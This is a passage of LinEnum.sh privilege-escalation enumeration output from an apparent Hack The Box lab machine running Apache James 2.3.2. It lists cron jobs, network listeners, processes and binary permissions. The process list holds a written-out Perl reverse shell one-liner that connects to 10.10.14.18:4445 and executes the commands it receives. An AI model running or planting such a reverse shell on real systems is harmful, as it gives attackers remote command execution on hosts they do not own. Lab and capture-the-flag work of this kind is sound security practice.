  2621. drwxr-xr-x 22 root root 4.0K Jun 18 2017 ..
  2622. drwxr-xr-x 16 james osboxes 4.0K Aug 22 10:20 james
  2623. drwxr-x--- 4 mindy mindy 4.0K Jan 5 05:00 mindy
  2624.  
  2625.  
  2626. Root is allowed to login via SSH:
  2627. PermitRootLogin yes
  2628.  
  2629.  
  2630. ### ENVIRONMENTAL #######################################
  2631.  Environment information:
  2632. SSH_CONNECTION=10.10.15.21 41482 10.10.10.51 22
  2633. LANG=en_US.UTF-8
  2634. OLDPWD=/opt
  2635. XDG_SESSION_ID=19
  2636. USER=mindy
  2637. PWD=/tmp
  2638. HOME=/home/mindy
  2639. SSH_CLIENT=10.10.15.21 41482 22
  2640. SSH_TTY=/dev/pts/4
  2641. MAIL=/var/mail/mindy
  2642. TERM=xterm-256color
  2643. SHELL=/bin/bash
  2644. SHLVL=3
  2645. LOGNAME=mindy
  2646. DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
  2647. XDG_RUNTIME_DIR=/run/user/1001
  2648. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  2649. _=/usr/bin/env
  2650.  
  2651.  
  2652. Path information:
  2653. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  2654.  
  2655.  
  2656. Available shells:
  2657. # /etc/shells: valid login shells
  2658. /bin/sh
  2659. /bin/dash
  2660. /bin/bash
  2661. /bin/rbash
  2662.  
  2663.  
  2664. Current umask value:
  2665. 0007
  2666. u=rwx,g=rwx,o=
  2667.  
  2668.  
  2669. umask value as specified in /etc/login.defs:
  2670. UMASK 022
  2671.  
  2672.  
  2673. Password and storage information:
  2674. PASS_MAX_DAYS 99999
  2675. PASS_MIN_DAYS 0
  2676. PASS_WARN_AGE 7
  2677. ENCRYPT_METHOD SHA512
  2678.  
  2679.  
  2680. ### JOBS/TASKS ##########################################
  2681. Cron jobs:
  2682. -rw-r--r-- 1 root root 722 May 3 2015 /etc/crontab
  2683.  
  2684. /etc/cron.d:
  2685. total 24
  2686. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  2687. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  2688. -rw-r--r-- 1 root root 285 May 29 2017 anacron
  2689. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  2690.  
  2691. /etc/cron.daily:
  2692. total 56
  2693. drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
  2694. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  2695. -rwxr-xr-x 1 root root 311 May 29 2017 0anacron
  2696. -rwxr-xr-x 1 root root 539 Jul 18 14:36 apache2
  2697. -rwxr-xr-x 1 root root 1474 Jun 1 2017 apt-compat
  2698. -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
  2699. -rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
  2700. -rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg
  2701. -rwxr-xr-x 1 root root 89 May 5 2015 logrotate
  2702. -rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
  2703. -rwxr-xr-x 1 root root 249 May 17 2017 passwd
  2704. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  2705.  
  2706. /etc/cron.hourly:
  2707. total 20
  2708. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  2709. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  2710. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  2711.  
  2712. /etc/cron.monthly:
  2713. total 24
  2714. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  2715. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  2716. -rwxr-xr-x 1 root root 313 May 29 2017 0anacron
  2717. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  2718.  
  2719. /etc/cron.weekly:
  2720. total 28
  2721. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  2722. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  2723. -rwxr-xr-x 1 root root 312 May 29 2017 0anacron
  2724. -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
  2725. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  2726.  
  2727.  
  2728. Crontab contents:
  2729. # /etc/crontab: system-wide crontab
  2730. # Unlike any other crontab you don't have to run the `crontab'
  2731. # command to install the new version when you edit this file
  2732. # and files in /etc/cron.d. These files also have username fields,
  2733. # that none of the other crontabs do.
  2734.  
  2735. SHELL=/bin/sh
  2736. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  2737.  
  2738. # m h dom mon dow user command
  2739. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  2740. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  2741. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  2742. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  2743. #
  2744.  
  2745.  
  2746. Anacron jobs and associated file permissions:
  2747. -rw-r--r-- 1 root root 401 May 29 2017 /etc/anacrontab
  2748. # /etc/anacrontab: configuration file for anacron
  2749.  
  2750. # See anacron(8) and anacrontab(5) for details.
  2751.  
  2752. SHELL=/bin/sh
  2753. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  2754. HOME=/root
  2755. LOGNAME=root
  2756.  
  2757. # These replace cron's entries
  2758. 1 5 cron.daily run-parts --report /etc/cron.daily
  2759. 7 10 cron.weekly run-parts --report /etc/cron.weekly
  2760. @monthly 15 cron.monthly run-parts --report /etc/cron.monthly
  2761.  
  2762.  
  2763. When were jobs last executed (/var/spool/anacron contents):
  2764. total 20
  2765. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  2766. drwxr-xr-x 7 root root 4096 Jun 18 2017 ..
  2767. -rw------- 1 root root 9 Jan 5 04:35 cron.daily
  2768. -rw------- 1 root root 9 Dec 23 18:36 cron.monthly
  2769. -rw------- 1 root root 9 Jan 5 04:40 cron.weekly
  2770.  
  2771.  
  2772. ### NETWORKING ##########################################
  2773. Network & IP info:
  2774. ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  2775. inet 10.10.10.51 netmask 255.255.255.0 broadcast 10.10.10.255
  2776. inet6 fe80::250:56ff:feaa:a9e9 prefixlen 64 scopeid 0x20<link>
  2777. inet6 dead:beef::250:56ff:feaa:a9e9 prefixlen 64 scopeid 0x0<global>
  2778. ether 00:50:56:aa:a9:e9 txqueuelen 1000 (Ethernet)
  2779. RX packets 18678 bytes 2993169 (2.8 MiB)
  2780. RX errors 0 dropped 50 overruns 0 frame 0
  2781. TX packets 14371 bytes 3683126 (3.5 MiB)
  2782. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  2783. device interrupt 19 base 0x2000
  2784.  
  2785. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  2786. inet 127.0.0.1 netmask 255.0.0.0
  2787. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  2788. loop txqueuelen 1 (Local Loopback)
  2789. RX packets 14168 bytes 1146886 (1.0 MiB)
  2790. RX errors 0 dropped 0 overruns 0 frame 0
  2791. TX packets 14168 bytes 1146886 (1.0 MiB)
  2792. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  2793.  
  2794.  
  2795. ARP history:
  2796. gateway (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens33
  2797.  
  2798.  
  2799. Default route:
  2800. default gateway 0.0.0.0 UG 0 0 0 ens33
  2801.  
  2802.  
  2803. Listening TCP:
  2804. Active Internet connections (servers and established)
  2805. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  2806. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  2807. tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
  2808. tcp 0 0 10.10.10.51:22 10.10.14.125:34554 TIME_WAIT -
  2809. tcp 0 0 10.10.10.51:22 10.10.14.125:34550 TIME_WAIT -
  2810. tcp 0 0 10.10.10.51:37554 10.10.14.18:4445 ESTABLISHED 892/perl
  2811. tcp 0 0 10.10.10.51:22 10.10.14.239:39624 ESTABLISHED -
  2812. tcp 0 0 10.10.10.51:22 10.10.14.125:34564 TIME_WAIT -
  2813. tcp 0 0 10.10.10.51:22 10.10.15.219:44592 ESTABLISHED -
  2814. tcp 0 0 10.10.10.51:22 10.10.14.125:34546 TIME_WAIT -
  2815. tcp 0 0 10.10.10.51:22 10.10.17.78:53052 ESTABLISHED -
  2816. tcp 0 0 10.10.10.51:22 10.10.14.125:34544 TIME_WAIT -
  2817. tcp 0 0 10.10.10.51:22 10.10.14.125:34560 TIME_WAIT -
  2818. tcp 0 0 10.10.10.51:22 10.10.14.18:47522 ESTABLISHED -
  2819. tcp 0 0 10.10.10.51:22 10.10.14.125:34558 TIME_WAIT -
  2820. tcp 0 0 10.10.10.51:22 10.10.14.125:34568 TIME_WAIT -
  2821. tcp 0 0 10.10.10.51:22 10.10.14.125:34570 TIME_WAIT -
  2822. tcp 0 0 10.10.10.51:22 10.10.15.21:41482 ESTABLISHED -
  2823. tcp 0 0 10.10.10.51:22 10.10.14.125:34548 TIME_WAIT -
  2824. tcp 0 0 10.10.10.51:22 10.10.14.125:34566 TIME_WAIT -
  2825. tcp 0 0 10.10.10.51:22 10.10.14.125:34556 TIME_WAIT -
  2826. tcp6 0 0 :::22 :::* LISTEN -
  2827. tcp6 0 0 ::1:631 :::* LISTEN -
  2828. tcp6 0 0 :::119 :::* LISTEN -
  2829. tcp6 0 0 :::25 :::* LISTEN -
  2830. tcp6 0 0 :::4555 :::* LISTEN -
  2831. tcp6 0 0 :::110 :::* LISTEN -
  2832. tcp6 0 0 :::80 :::* LISTEN -
  2833.  
  2834.  
  2835. Listening UDP:
  2836. Active Internet connections (servers and established)
  2837. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  2838. udp 0 0 0.0.0.0:631 0.0.0.0:* -
  2839. udp 0 0 0.0.0.0:38595 0.0.0.0:* -
  2840. udp 0 0 0.0.0.0:5353 0.0.0.0:* -
  2841. udp 0 0 0.0.0.0:1900 0.0.0.0:* -
  2842. udp6 0 0 :::5353 :::* -
  2843. udp6 0 0 :::59206 :::* -
  2844.  
  2845.  
  2846. ### SERVICES #############################################
  2847. Running processes:
  2848. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  2849. root 1 0.0 1.1 26984 5648 ? Ss 04:30 0:02 /sbin/init
  2850. root 2 0.0 0.0 0 0 ? S 04:30 0:00 [kthreadd]
  2851. root 3 0.0 0.0 0 0 ? S 04:30 0:00 [ksoftirqd/0]
  2852. root 5 0.0 0.0 0 0 ? S< 04:30 0:00 [kworker/0:0H]
  2853. root 7 0.0 0.0 0 0 ? S 04:30 0:00 [rcu_sched]
  2854. root 8 0.0 0.0 0 0 ? S 04:30 0:00 [rcu_bh]
  2855. root 9 0.0 0.0 0 0 ? S 04:30 0:00 [migration/0]
  2856. root 10 0.0 0.0 0 0 ? S< 04:30 0:00 [lru-add-drain]
  2857. root 11 0.0 0.0 0 0 ? S 04:30 0:00 [watchdog/0]
  2858. root 12 0.0 0.0 0 0 ? S 04:30 0:00 [cpuhp/0]
  2859. root 13 0.0 0.0 0 0 ? S 04:30 0:00 [kdevtmpfs]
  2860. root 14 0.0 0.0 0 0 ? S< 04:30 0:00 [netns]
  2861. root 15 0.0 0.0 0 0 ? S 04:30 0:00 [khungtaskd]
  2862. root 16 0.0 0.0 0 0 ? S 04:30 0:00 [oom_reaper]
  2863. root 17 0.0 0.0 0 0 ? S< 04:30 0:00 [writeback]
  2864. root 18 0.0 0.0 0 0 ? S 04:30 0:00 [kcompactd0]
  2865. root 19 0.0 0.0 0 0 ? SN 04:30 0:00 [ksmd]
  2866. root 21 0.0 0.0 0 0 ? S< 04:30 0:00 [crypto]
  2867. root 22 0.0 0.0 0 0 ? S< 04:30 0:00 [kintegrityd]
  2868. root 23 0.0 0.0 0 0 ? S< 04:30 0:00 [bioset]
  2869. root 24 0.0 0.0 0 0 ? S< 04:30 0:00 [kblockd]
  2870. root 25 0.0 0.0 0 0 ? S< 04:30 0:00 [devfreq_wq]
  2871. root 26 0.0 0.0 0 0 ? S< 04:30 0:00 [watchdogd]
  2872. root 27 0.0 0.0 0 0 ? S 04:30 0:00 [kswapd0]
  2873. root 28 0.0 0.0 0 0 ? S< 04:30 0:00 [vmstat]
  2874. root 40 0.0 0.0 0 0 ? S< 04:30 0:00 [kthrotld]
  2875. root 41 0.0 0.0 0 0 ? S< 04:30 0:00 [ipv6_addrconf]
  2876. root 83 0.0 0.0 0 0 ? S< 04:30 0:00 [ata_sff]
  2877. root 84 0.0 0.0 0 0 ? S 04:30 0:00 [scsi_eh_0]
  2878. root 85 0.0 0.0 0 0 ? S 04:30 0:00 [scsi_eh_1]
  2879. root 86 0.0 0.0 0 0 ? S< 04:30 0:00 [scsi_tmf_0]
  2880. root 87 0.0 0.0 0 0 ? S< 04:30 0:00 [scsi_tmf_1]
  2881. root 88 0.0 0.0 0 0 ? S 04:30 0:00 [scsi_eh_2]
  2882. root 89 0.0 0.0 0 0 ? S< 04:30 0:00 [vmw_pvscsi_wq_1]
  2883. root 90 0.0 0.0 0 0 ? S< 04:30 0:00 [scsi_tmf_2]
  2884. root 91 0.0 0.0 0 0 ? S< 04:30 0:00 [bioset]
  2885. root 92 0.0 0.0 0 0 ? S 04:30 0:00 [kworker/u2:2]
  2886. root 127 0.0 0.0 0 0 ? S< 04:30 0:00 [bioset]
  2887. root 130 0.0 0.0 0 0 ? S< 04:30 0:00 [kworker/0:1H]
  2888. root 167 0.0 0.0 0 0 ? S 04:30 0:00 [jbd2/sda1-8]
  2889. root 168 0.0 0.0 0 0 ? S< 04:30 0:00 [ext4-rsv-conver]
  2890. root 195 0.0 0.8 24792 4216 ? Ss 04:30 0:01 /lib/systemd/systemd-journald
  2891. root 201 0.0 0.0 0 0 ? S 04:30 0:00 [kauditd]
  2892. root 205 0.0 0.5 16088 2780 ? Ss 04:30 0:00 /lib/systemd/systemd-udevd
  2893. systemd+ 272 0.0 0.6 16964 3548 ? Ssl 04:30 0:00 /lib/systemd/systemd-timesyncd
  2894. root 273 0.0 0.0 0 0 ? S< 04:30 0:00 [nfit]
  2895. root 276 0.0 0.0 0 0 ? S< 04:30 0:00 [ttm_swap]
  2896. root 330 0.0 0.8 7440 4148 ? Ss 04:30 0:00 /lib/systemd/systemd-logind
  2897. root 331 0.0 0.4 23108 2472 ? Ssl 04:30 0:00 /usr/sbin/rsyslogd -n
  2898. root 332 0.0 0.6 50884 3392 ? Ssl 04:30 0:00 /usr/sbin/ModemManager
  2899. root 333 0.0 0.1 2332 552 ? Ss 04:30 0:00 /bin/sh /opt/james-2.3.2/bin/run.sh
  2900. rtkit 340 0.0 0.4 24100 2512 ? SNsl 04:30 0:00 /usr/lib/rtkit/rtkit-daemon
  2901. avahi 341 0.0 0.5 6256 2660 ? Ss 04:30 0:02 avahi-daemon: running [solidstate.local]
  2902. message+ 342 0.0 0.6 6812 3392 ? Ss 04:30 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  2903. root 381 0.2 7.0 441208 35892 ? Sl 04:30 0:07 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
  2904. root 386 0.0 0.8 38336 4420 ? Ssl 04:30 0:00 /usr/lib/accountsservice/accounts-daemon
  2905. root 387 0.0 1.1 84132 5680 ? Ssl 04:30 0:00 /usr/sbin/NetworkManager --no-daemon
  2906. root 391 0.0 0.5 5264 2724 ? Ss 04:30 0:00 /usr/sbin/cron -f
  2907. avahi 399 0.0 0.0 6256 60 ? S 04:30 0:00 avahi-daemon: chroot helper
  2908. root 415 0.0 1.1 38624 5752 ? Ssl 04:30 0:00 /usr/lib/policykit-1/polkitd --no-debug
  2909. root 530 0.0 0.7 10472 3648 ? Ss 04:30 0:00 /usr/sbin/sshd -D
  2910. root 538 0.0 0.0 2236 64 ? Ss 04:30 0:00 /usr/sbin/minissdpd -i 0.0.0.0
  2911. root 549 0.0 0.8 40204 4440 ? Ssl 04:30 0:00 /usr/sbin/gdm3
  2912. root 556 0.0 1.0 31512 5196 ? Sl 04:30 0:00 gdm-session-worker [pam/gdm-launch-environment]
  2913. Debian-+ 573 0.0 1.0 9484 5528 ? Ss 04:30 0:00 /lib/systemd/systemd --user
  2914. Debian-+ 575 0.0 0.1 10560 780 ? S 04:30 0:00 (sd-pam)
  2915. Debian-+ 579 0.0 0.5 27632 3004 tty1 Ssl+ 04:30 0:00 /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart
  2916. root 580 0.0 0.6 6408 3220 ? Ss 04:30 0:00 /usr/sbin/apache2 -k start
  2917. Debian-+ 583 0.0 0.6 6368 3224 ? Ss 04:30 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation
  2918. www-data 585 0.0 0.6 228916 3084 ? Sl 04:30 0:00 /usr/sbin/apache2 -k start
  2919. www-data 586 0.0 0.6 228916 3084 ? Sl 04:30 0:00 /usr/sbin/apache2 -k start
  2920. Debian-+ 643 0.0 1.0 75148 5412 tty1 Sl+ 04:30 0:00 /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart
  2921. Debian-+ 651 0.6 15.7 832752 80124 tty1 Sl+ 04:30 0:15 /usr/bin/gnome-shell
  2922. root 673 0.0 1.0 50320 5116 ? Ssl 04:30 0:00 /usr/lib/upower/upowerd
  2923. Debian-+ 699 0.0 2.6 81916 13584 tty1 S+ 04:30 0:00 /usr/bin/Xwayland :1024 -rootless -noreset -listen 4 -listen 5 -displayfd 6
  2924. Debian-+ 703 0.0 0.7 44412 3624 ? Ssl 04:30 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
  2925. Debian-+ 708 0.0 0.5 6260 2808 ? S 04:30 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
  2926. Debian-+ 710 0.0 0.7 30484 3940 ? Sl 04:30 0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
  2927. Debian-+ 713 0.0 1.0 888536 5320 ? Ssl 04:30 0:00 /usr/bin/pulseaudio --daemonize=no
  2928. root 772 0.0 0.7 11156 4000 ? Ss 04:30 0:00 sshd: mindy [priv]
  2929. root 781 0.0 0.7 10772 4016 ? Ss 04:30 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
  2930. root 782 0.0 1.3 46500 7132 ? Ssl 04:30 0:00 /usr/lib/packagekit/packagekitd
  2931. Debian-+ 785 0.0 3.8 439812 19512 tty1 Sl+ 04:30 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
  2932. mindy 795 0.0 1.0 9484 5488 ? Ss 04:30 0:00 /lib/systemd/systemd --user
  2933. mindy 796 0.0 0.1 10560 928 ? S 04:30 0:00 (sd-pam)
  2934. mindy 806 0.0 0.6 11292 3176 ? S 04:30 0:00 sshd: mindy@pts/0
  2935. colord 807 0.0 2.1 45656 11088 ? Ssl 04:30 0:00 /usr/lib/colord/colord
  2936. mindy 811 0.0 0.8 6628 4104 pts/0 Ss 04:30 0:00 -rbash
  2937. root 864 0.0 0.7 11156 4004 ? Ss 04:31 0:00 sshd: mindy [priv]
  2938. mindy 871 0.0 0.4 11156 2376 ? S 04:31 0:00 sshd: mindy@pts/1
  2939. mindy 872 0.0 0.8 6740 4272 pts/1 Ss 04:31 0:00 -rbash
  2940. mindy 892 0.0 1.0 8956 5204 pts/1 S 04:31 0:00 perl -MIO -e $p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.18:4445");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};
  2941. root 1045 0.0 0.9 14652 5040 ? Ss 04:35 0:00 /usr/sbin/cupsd -l
  2942. root 1047 0.0 0.7 35424 3752 ? Ssl 04:35 0:00 /usr/sbin/cups-browsed
  2943. root 1179 0.0 0.7 11156 4016 ? Ss 04:43 0:00 sshd: mindy [priv]
  2944. mindy 1185 0.0 0.8 12496 4368 ? S 04:43 0:00 sshd: mindy@pts/2
  2945. mindy 1186 0.0 0.8 6804 4156 pts/2 Ss 04:43 0:00 -rbash
  2946. mindy 1382 0.0 0.6 5660 3416 pts/1 S+ 04:48 0:00 bash
  2947. root 1521 0.0 0.7 11156 3880 ? Ss 04:53 0:00 sshd: mindy [priv]
  2948. mindy 1527 0.0 0.4 11156 2392 ? S 04:53 0:00 sshd: mindy@pts/4
  2949. mindy 1528 0.0 0.8 6748 4220 pts/4 Ss 04:53 0:00 -rbash
  2950. mindy 1632 0.0 0.7 5680 3664 pts/4 S 04:53 0:00 bash
  2951. mindy 1704 0.0 0.6 5600 3088 pts/2 S 04:56 0:00 bash
  2952. mindy 1736 0.0 0.6 5732 3352 pts/2 S 04:57 0:00 bash
  2953. root 1792 0.0 0.7 11156 3920 ? Ss 04:59 0:00 sshd: mindy [priv]
  2954. mindy 1802 0.0 0.4 11156 2452 ? S 04:59 0:00 sshd: mindy@pts/3
  2955. mindy 1803 0.0 0.8 6748 4304 pts/3 Ss 04:59 0:00 -rbash
  2956. mindy 1931 0.0 0.5 5604 2656 pts/2 S+ 04:59 0:00 /bin/bash
  2957. mindy 1963 0.0 0.7 5680 3684 pts/3 S 05:00 0:00 bash
  2958. root 2011 0.0 0.0 0 0 ? S 05:01 0:00 [kworker/0:0]
  2959. root 2219 0.0 0.0 0 0 ? S 05:06 0:00 [kworker/0:2]
  2960. root 2242 0.0 0.0 0 0 ? S 05:07 0:00 [kworker/u2:0]
  2961. mindy 2331 0.0 0.7 5676 3668 pts/0 S+ 05:10 0:00 bash
  2962. root 2375 0.0 0.0 0 0 ? S 05:11 0:00 [kworker/0:1]
  2963. mindy 2436 0.0 0.7 5660 3572 pts/3 S+ 05:13 0:00 bash
  2964. mindy 3220 1.5 0.5 5324 2964 pts/4 S+ 05:13 0:00 /bin/bash ./LinEnum.sh
  2965. mindy 3542 0.0 0.3 5308 1800 pts/4 S+ 05:13 0:00 /bin/bash ./LinEnum.sh
  2966. mindy 3543 0.0 0.6 7672 3288 pts/4 R+ 05:13 0:00 ps aux
  2967.  
  2968.  
  2969. Process binaries & associated permissions (from above list):
  2970. 936K -rwxr-xr-x 1 root root 935K Jun 17 2017 /usr/sbin/sshd
  2971. 696K -rwxr-xr-x 1 root root 695K Jan 18 2017 /usr/sbin/rsyslogd
  2972. 2.7M -rwxr-xr-x 1 root root 2.7M Mar 18 2017 /usr/sbin/NetworkManager
  2973. 1.4M -rwxr-xr-x 1 root root 1.4M Nov 16 2016 /usr/sbin/ModemManager
  2974. 32K -rwxr-xr-x 1 root root 30K May 8 2017 /usr/sbin/minissdpd
  2975. 432K -rwxr-xr-x 1 root root 432K Jun 6 2017 /usr/sbin/gdm3
  2976. 496K -rwxr-xr-x 1 root root 494K Jan 31 2017 /usr/sbin/cupsd
  2977. 172K -rwxr-xr-x 1 root root 170K Jan 19 2017 /usr/sbin/cups-browsed
  2978. 48K -rwxr-xr-x 1 root root 47K May 3 2015 /usr/sbin/cron
  2979. 636K -rwxr-xr-x 1 root root 633K Jul 18 14:37 /usr/sbin/apache2
  2980. 248K -rwxr-xr-x 1 root root 246K Sep 19 2016 /usr/lib/upower/upowerd
  2981. 64K -rwxr-xr-x 1 root root 63K Oct 24 2015 /usr/lib/rtkit/rtkit-daemon
  2982. 16K -rwxr-xr-x 1 root root 14K May 24 2017 /usr/lib/policykit-1/polkitd
  2983. 308K -rwxr-xr-x 1 root root 306K Mar 8 2017 /usr/lib/packagekit/packagekitd
  2984. 0 lrwxrwxrwx 1 root root 15 Jul 23 08:12 /usr/lib/jvm/java-8-openjdk-i386//bin/java -> ../jre/bin/java
  2985. 40K -rwxr-xr-x 1 root root 39K Apr 24 2017 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
  2986. 312K -rwxr-xr-x 1 root root 312K Mar 9 2017 /usr/lib/gnome-session/gnome-session-binary
  2987. 60K -rwxr-xr-x 1 root root 59K Jun 6 2017 /usr/lib/gdm3/gdm-wayland-session
  2988. 324K -rwxr-xr-x 1 root root 322K Sep 6 2016 /usr/lib/colord/colord
  2989. 20K -rwxr-xr-x 1 root root 18K May 9 2017 /usr/lib/at-spi2-core/at-spi-bus-launcher
  2990. 92K -rwxr-xr-x 1 root root 89K May 9 2017 /usr/lib/at-spi2-core/at-spi2-registryd
  2991. 156K -rwxr-xr-x 1 root root 155K Dec 29 2016 /usr/lib/accountsservice/accounts-daemon
  2992. 2.4M -rwxr-xr-x 1 root root 2.4M Jul 7 01:09 /usr/bin/Xwayland
  2993. 88K -rwxr-xr-x 1 root root 86K Jan 19 2017 /usr/bin/pulseaudio
  2994. 16K -rwxr-xr-x 1 root root 14K Apr 26 2017 /usr/bin/gnome-shell
  2995. 256K -rwxr-xr-x 1 root root 254K Apr 5 2017 /usr/bin/dbus-daemon
  2996. 2.4M -rwxr-xr-x 1 root root 2.4M Feb 20 2017 /sbin/wpa_supplicant
  2997. 0 lrwxrwxrwx 1 root root 20 Jun 4 2017 /sbin/init -> /lib/systemd/systemd
  2998. 452K -rwxr-xr-x 1 root root 450K Jun 4 2017 /lib/systemd/systemd-udevd
  2999. 40K -rwxr-xr-x 1 root root 38K Jun 4 2017 /lib/systemd/systemd-timesyncd
  3000. 208K -rwxr-xr-x 1 root root 206K Jun 4 2017 /lib/systemd/systemd-logind
  3001. 116K -rwxr-xr-x 1 root root 114K Jun 4 2017 /lib/systemd/systemd-journald
  3002. 1.1M -rwxr-xr-x 1 root root 1.1M Jun 4 2017 /lib/systemd/systemd
  3003. 0 lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
  3004. 1.3M -rwxr-xr-x 1 root root 1.3M May 15 2017 /bin/bash
  3005.  
  3006.  
  3007. /etc/init.d/ binary permissions:
  3008. total 148
  3009. drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
  3010. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  3011. -rwxr-xr-x 1 root root 5336 Feb 1 2016 alsa-utils
  3012. -rwxr-xr-x 1 root root 2014 May 29 2017 anacron
  3013. -rwxr-xr-x 1 root root 8181 Jul 18 14:36 apache2
  3014. -rwxr-xr-x 1 root root 2225 Jul 18 14:36 apache-htcacheclean
  3015. -rwxr-xr-x 1 root root 2401 Jan 23 2017 avahi-daemon
  3016. -rwxr-xr-x 1 root root 2948 Oct 24 2016 bluetooth
  3017. -rwxr-xr-x 1 root root 1232 Apr 6 2017 console-setup.sh
  3018. -rwxr-xr-x 1 root root 3049 May 3 2015 cron
  3019. -rwxr-xr-x 1 root root 2816 Jan 18 2017 cups
  3020. -rwxr-xr-x 1 root root 1961 Jan 19 2017 cups-browsed
  3021. -rwxr-xr-x 1 root root 2813 Apr 5 2017 dbus
  3022. -rwxr-xr-x 1 root root 3033 May 20 2014 gdm3
  3023. -rwxr-xr-x 1 root root 3809 Mar 22 2017 hwclock.sh
  3024. -rwxr-xr-x 1 root root 1479 May 18 2016 keyboard-setup.sh
  3025. -rwxr-xr-x 1 root root 2044 Dec 25 2016 kmod
  3026. -rwxr-xr-x 1 root root 2241 Apr 26 2017 minissdpd
  3027. -rwxr-xr-x 1 root root 4597 Sep 16 2016 networking
  3028. -rwxr-xr-x 1 root root 1757 Mar 18 2017 network-manager
  3029. -rwxr-xr-x 1 root root 612 Dec 4 2015 pppd-dns
  3030. -rwxr-xr-x 1 root root 1191 Nov 22 2016 procps
  3031. -rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
  3032. -rwxr-xr-x 1 root root 2868 Jan 18 2017 rsyslog
  3033. -rwxr-xr-x 1 root root 2330 May 21 2017 saned
  3034. -rwxr-xr-x 1 root root 2117 Jan 9 2017 speech-dispatcher
  3035. -rwxr-xr-x 1 root root 4033 Jun 17 2017 ssh
  3036. -rwxr-xr-x 1 root root 6087 Jun 4 2017 udev
  3037. -rwxr-xr-x 1 root root 1391 May 6 2017 unattended-upgrades
  3038. -rwxr-xr-x 1 root root 2757 Nov 23 2016 x11-common
  3039.  
  3040.  
  3041. ### SOFTWARE #############################################
  3042. Apache version:
  3043. Server version: Apache/2.4.25 (Debian)
  3044. Server built: 2017-07-18T18:37:33
  3045.  
  3046.  
  3047. Apache user configuration:
  3048. APACHE_RUN_USER=www-data
  3049. APACHE_RUN_GROUP=www-data
  3050.  
  3051.  
  3052. Installed Apache modules:
  3053. Loaded Modules:
  3054. core_module (static)
  3055. so_module (static)
  3056. watchdog_module (static)
  3057. http_module (static)
  3058. log_config_module (static)
  3059. logio_module (static)
  3060. version_module (static)
  3061. unixd_module (static)
  3062. access_compat_module (shared)
  3063. alias_module (shared)
  3064. auth_basic_module (shared)
  3065. authn_core_module (shared)
  3066. authn_file_module (shared)
  3067. authz_core_module (shared)
  3068. authz_host_module (shared)
  3069. authz_user_module (shared)
  3070. autoindex_module (shared)
